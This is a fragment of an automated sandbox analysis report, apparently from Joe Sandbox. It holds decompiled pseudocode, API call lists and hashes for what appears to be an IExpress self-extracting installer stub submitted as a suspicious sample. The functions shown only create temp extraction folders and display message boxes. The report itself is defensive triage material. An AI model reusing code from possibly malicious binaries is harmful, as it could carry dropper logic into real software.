                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa48b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E00A45467(0xa48b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E00A444B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E00A46CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a4577e
                                                                                                                                                                                                                                            0x00a4577e
                                                                                                                                                                                                                                            0x00a45781
                                                                                                                                                                                                                                            0x00a45788
                                                                                                                                                                                                                                            0x00a4578d
                                                                                                                                                                                                                                            0x00a4578f
                                                                                                                                                                                                                                            0x00a457b2
                                                                                                                                                                                                                                            0x00a457b8
                                                                                                                                                                                                                                            0x00a457bd
                                                                                                                                                                                                                                            0x00a457bf
                                                                                                                                                                                                                                            0x00a457cd
                                                                                                                                                                                                                                            0x00a457cd
                                                                                                                                                                                                                                            0x00a457dd
                                                                                                                                                                                                                                            0x00a457e3
                                                                                                                                                                                                                                            0x00a457ef
                                                                                                                                                                                                                                            0x00a457f5
                                                                                                                                                                                                                                            0x00a457f8
                                                                                                                                                                                                                                            0x00a4580a
                                                                                                                                                                                                                                            0x00a4580a
                                                                                                                                                                                                                                            0x00a457fa
                                                                                                                                                                                                                                            0x00a45802
                                                                                                                                                                                                                                            0x00a45802
                                                                                                                                                                                                                                            0x00a4580d
                                                                                                                                                                                                                                            0x00a4580f
                                                                                                                                                                                                                                            0x00a45830
                                                                                                                                                                                                                                            0x00a45836
                                                                                                                                                                                                                                            0x00a4583d
                                                                                                                                                                                                                                            0x00a4584b
                                                                                                                                                                                                                                            0x00a45851
                                                                                                                                                                                                                                            0x00a45855
                                                                                                                                                                                                                                            0x00a4585a
                                                                                                                                                                                                                                            0x00a4585c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4585e
                                                                                                                                                                                                                                            0x00a4585e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4585e
                                                                                                                                                                                                                                            0x00a45811
                                                                                                                                                                                                                                            0x00a45817
                                                                                                                                                                                                                                            0x00a45819
                                                                                                                                                                                                                                            0x00a4581f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4581f
                                                                                                                                                                                                                                            0x00a45791
                                                                                                                                                                                                                                            0x00a45797
                                                                                                                                                                                                                                            0x00a4579c
                                                                                                                                                                                                                                            0x00a4579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a457a0
                                                                                                                                                                                                                                            0x00a457a9
                                                                                                                                                                                                                                            0x00a457ae
                                                                                                                                                                                                                                            0x00a457b0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a457b0
                                                                                                                                                                                                                                            0x00a4579e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45769
                                                                                                                                                                                                                                            0x00a45762
                                                                                                                                                                                                                                            0x00a45753
                                                                                                                                                                                                                                            0x00a4574f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4572e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45864
                                                                                                                                                                                                                                            0x00a45864
                                                                                                                                                                                                                                            0x00a45864
                                                                                                                                                                                                                                            0x00a45717
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a456c3
                                                                                                                                                                                                                                            0x00a456c5
                                                                                                                                                                                                                                            0x00a456c9
                                                                                                                                                                                                                                            0x00a456ce
                                                                                                                                                                                                                                            0x00a456d0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a456d6
                                                                                                                                                                                                                                            0x00a456d6
                                                                                                                                                                                                                                            0x00a456d8
                                                                                                                                                                                                                                            0x00a456dd
                                                                                                                                                                                                                                            0x00a456df
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a456e1
                                                                                                                                                                                                                                            0x00a456e2
                                                                                                                                                                                                                                            0x00a456e4
                                                                                                                                                                                                                                            0x00a456e6
                                                                                                                                                                                                                                            0x00a456eb
                                                                                                                                                                                                                                            0x00a456ed
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a456f3
                                                                                                                                                                                                                                            0x00a456f3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4586c
                                                                                                                                                                                                                                            0x00a45878
                                                                                                                                                                                                                                            0x00a4587e
                                                                                                                                                                                                                                            0x00a45882
                                                                                                                                                                                                                                            0x00a45883
                                                                                                                                                                                                                                            0x00a45889
                                                                                                                                                                                                                                            0x00a4588e
                                                                                                                                                                                                                                            0x00a4588e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45896
                                                                                                                                                                                                                                            0x00a456ed
                                                                                                                                                                                                                                            0x00a456df
                                                                                                                                                                                                                                            0x00a456d0
                                                                                                                                                                                                                                            0x00a456c1
                                                                                                                                                                                                                                            0x00a456a8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446A0
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: SizeofResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446A9
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A446C3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LoadResource.KERNEL32(00000000,00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: LockResource.KERNEL32(00000000,?,00A42D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446D3
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: memcpy_s.MSVCRT ref: 00A446E5
                                                                                                                                                                                                                                              • Part of subcall function 00A4468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A446EF
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 00A455CF
                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00A45638
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A4564C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00A45620
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                              • Part of subcall function 00A444B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                              • Part of subcall function 00A46285: GetLastError.KERNEL32(00A45BBC), ref: 00A46285
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00A456B9
                                                                                                                                                                                                                                            • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 00A4571E
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00A45737
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 00A457CD
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 00A457EF
                                                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00A45802
                                                                                                                                                                                                                                              • Part of subcall function 00A42630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00A42654
                                                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00A45830
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: FindResourceA.KERNEL32(00A40000,000007D6,00000005), ref: 00A4652A
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: LoadResource.KERNEL32(00A40000,00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A46538
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: DialogBoxIndirectParamA.USER32(00A40000,00000000,00000547,00A419E0,00000000), ref: 00A46557
                                                                                                                                                                                                                                              • Part of subcall function 00A46517: FreeResource.KERNEL32(00000000,?,?,00A42EE8,00000000,00A419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A46560
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00A45878
                                                                                                                                                                                                                                              • Part of subcall function 00A4597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 00A459A8
                                                                                                                                                                                                                                              • Part of subcall function 00A4597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 00A459AF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                            • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                            • API String ID: 2436801531-3855382519
                                                                                                                                                                                                                                            • Opcode ID: f79e2004a6cc083c9a13eb3c5f635cd935f68aa07fee8bff2f5e1dac3a7149f9
                                                                                                                                                                                                                                            • Instruction ID: 9846bc6fcffcae498f53a6bf09e2904cba3a1231a7a6ef11af71a71d35a33597
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f79e2004a6cc083c9a13eb3c5f635cd935f68aa07fee8bff2f5e1dac3a7149f9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB81167DE04A04ABDB20ABB49D85BEF726D9FE5340F040475F586D2193EFB48DC28A51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 406 a444b9-a444f8 407 a444fe-a44525 LoadStringA 406->407 408 a44679-a4467b 406->408 410 a44527-a4452e call a4681f 407->410 411 a44562-a44568 407->411 409 a4467c-a4468c call a46ce0 408->409 418 a44530-a4453d call a467c9 410->418 419 a4453f 410->419 413 a4456b-a44570 411->413 413->413 417 a44572-a4457c 413->417 420 a4457e-a44580 417->420 421 a445c9-a445cb 417->421 418->419 425 a44544-a44554 MessageBoxA 418->425 419->425 426 a44583-a44588 420->426 423 a44607-a44617 LocalAlloc 421->423 424 a445cd-a445cf 421->424 429 a4455a-a4455d 423->429 430 a4461d-a44628 call a41680 423->430 428 a445d2-a445d7 424->428 425->429 426->426 431 a4458a-a4458c 426->431 428->428 432 a445d9-a445ed LocalAlloc 428->432 429->409 436 a4462d-a4463d MessageBeep call a4681f 430->436 434 a4458f-a44594 431->434 432->429 435 a445f3-a44605 call a4171e 432->435 434->434 437 a44596-a445ad LocalAlloc 434->437 435->436 445 a4464e 436->445 446 a4463f-a4464c call a467c9 436->446 437->429 440 a445af-a445c7 call a4171e 437->440 440->436 448 a44653-a44677 MessageBoxA LocalFree 445->448 446->445 446->448 448->409
                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A444B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                                            				char _v576;
                                                                                                                                                                                                                                            				void* _v580;
                                                                                                                                                                                                                                            				struct HWND__* _v584;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t34;
                                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                                            				signed int _t39;
                                                                                                                                                                                                                                            				intOrPtr _t43;
                                                                                                                                                                                                                                            				signed int _t44;
                                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                                            				signed int _t52;
                                                                                                                                                                                                                                            				void* _t54;
                                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                            				intOrPtr _t59;
                                                                                                                                                                                                                                            				int _t64;
                                                                                                                                                                                                                                            				void* _t66;
                                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                                            				signed int _t69;
                                                                                                                                                                                                                                            				intOrPtr* _t73;
                                                                                                                                                                                                                                            				intOrPtr* _t76;
                                                                                                                                                                                                                                            				intOrPtr* _t77;
                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                                            				void* _t82;
                                                                                                                                                                                                                                            				intOrPtr* _t84;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				signed int _t89;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t75 = __edx;
                                                                                                                                                                                                                                            				_t34 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                            				_v584 = __ecx;
                                                                                                                                                                                                                                            				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                            				_t67 = _a4;
                                                                                                                                                                                                                                            				_t69 = 0xd;
                                                                                                                                                                                                                                            				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                            				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                            				_v580 = _t37;
                                                                                                                                                                                                                                            				asm("movsb");
                                                                                                                                                                                                                                            				if(( *0xa48a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            					_t39 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_v576 = 0;
                                                                                                                                                                                                                                            					LoadStringA( *0xa49a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                            					if(_v576 != 0) {
                                                                                                                                                                                                                                            						_t73 =  &_v576;
                                                                                                                                                                                                                                            						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                            						_t75 = _t16;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t43 =  *_t73;
                                                                                                                                                                                                                                            							_t73 = _t73 + 1;
                                                                                                                                                                                                                                            						} while (_t43 != 0);
                                                                                                                                                                                                                                            						_t84 = _v580;
                                                                                                                                                                                                                                            						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                                            							if(_t67 == 0) {
                                                                                                                                                                                                                                            								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                            								_t83 = _t27;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t75 = _t83;
                                                                                                                                                                                                                                            									_t74 = _t80;
                                                                                                                                                                                                                                            									E00A41680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t76 = _t67;
                                                                                                                                                                                                                                            								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                            								_t85 = _t24;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t55 =  *_t76;
                                                                                                                                                                                                                                            									_t76 = _t76 + 1;
                                                                                                                                                                                                                                            								} while (_t55 != 0);
                                                                                                                                                                                                                                            								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                            								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                            								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                            								_t80 = _t44;
                                                                                                                                                                                                                                            								if(_t80 == 0) {
                                                                                                                                                                                                                                            									goto L6;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A4171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            									goto L23;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t77 = _t67;
                                                                                                                                                                                                                                            							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                            							_t81 = _t18;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t58 =  *_t77;
                                                                                                                                                                                                                                            								_t77 = _t77 + 1;
                                                                                                                                                                                                                                            							} while (_t58 != 0);
                                                                                                                                                                                                                                            							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                            							_t82 = _t84 + 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t59 =  *_t84;
                                                                                                                                                                                                                                            								_t84 = _t84 + 1;
                                                                                                                                                                                                                                            							} while (_t59 != 0);
                                                                                                                                                                                                                                            							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                            							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                            							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                            							_t80 = _t44;
                                                                                                                                                                                                                                            							if(_t80 == 0) {
                                                                                                                                                                                                                                            								goto L6;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_push(_v580);
                                                                                                                                                                                                                                            								E00A4171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                            								L23:
                                                                                                                                                                                                                                            								MessageBeep(_a12);
                                                                                                                                                                                                                                            								if(E00A4681F(_t67) == 0) {
                                                                                                                                                                                                                                            									L25:
                                                                                                                                                                                                                                            									_t49 = 0x10000;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t54 = E00A467C9(_t74, _t74);
                                                                                                                                                                                                                                            									_t49 = 0x190000;
                                                                                                                                                                                                                                            									if(_t54 == 0) {
                                                                                                                                                                                                                                            										goto L25;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                            								_t83 = _t52;
                                                                                                                                                                                                                                            								LocalFree(_t80);
                                                                                                                                                                                                                                            								_t39 = _t52;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(E00A4681F(_t67) == 0) {
                                                                                                                                                                                                                                            							L4:
                                                                                                                                                                                                                                            							_t64 = 0x10010;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t66 = E00A467C9(0, 0);
                                                                                                                                                                                                                                            							_t64 = 0x190010;
                                                                                                                                                                                                                                            							if(_t66 == 0) {
                                                                                                                                                                                                                                            								goto L4;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                                                            						L6:
                                                                                                                                                                                                                                            						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A44518
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,?,cent,00010010), ref: 00A44554
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A445A3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000065), ref: 00A445E3
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000002), ref: 00A4460D
                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00A44630
                                                                                                                                                                                                                                            • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 00A44666
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A4466F
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00A4686E
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: GetSystemMetrics.USER32(0000004A), ref: 00A468A7
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00A468CC
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: RegQueryValueExA.ADVAPI32(?,00A41140,00000000,?,?,0000000C), ref: 00A468F4
                                                                                                                                                                                                                                              • Part of subcall function 00A4681F: RegCloseKey.ADVAPI32(?), ref: 00A46902
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                            • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                                                            • API String ID: 3244514340-2605220145
                                                                                                                                                                                                                                            • Opcode ID: c4993cdbae557bf728cccbb3dbb720ff5b467d507dc55b6b85c0ff0b3ca40a29
                                                                                                                                                                                                                                            • Instruction ID: 4e9ed8ccb56bba2bbd7a5f54fbc10571f2d160e9b5f62d2b58435a0e7360aa55
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4993cdbae557bf728cccbb3dbb720ff5b467d507dc55b6b85c0ff0b3ca40a29
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4451E47D900115ABDF21DF68DC48BAABB69EFCA300F114194FD09A7241DB72DD46CB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A453A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t5;
                                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                                            				int _t14;
                                                                                                                                                                                                                                            				CHAR* _t20;
                                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                                            				int _t30;
                                                                                                                                                                                                                                            				CHAR* _t32;
                                                                                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t5 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                            				_t32 = __edx;
                                                                                                                                                                                                                                            				_t20 = __ecx;
                                                                                                                                                                                                                                            				_t29 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					E00A4171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                            					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                            					_t29 = _t29 + 1;
                                                                                                                                                                                                                                            					E00A41680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                            					E00A4658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                            					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                            					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                            					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t29 < 0x190) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t30 = 0;
                                                                                                                                                                                                                                            					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                            						_t30 = 1;
                                                                                                                                                                                                                                            						DeleteFileA(_t32);
                                                                                                                                                                                                                                            						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					return E00A46CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                            				if(_t14 == 0) {
                                                                                                                                                                                                                                            					goto L3;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t30 = 1;
                                                                                                                                                                                                                                            				 *0xa48a20 = 1;
                                                                                                                                                                                                                                            				goto L5;
                                                                                                                                                                                                                                            			}


















APIs
  • Part of subcall function 00A4171E: _vsnprintf.MSVCRT ref: 00A41750
• RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A453FB
• GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00A45402
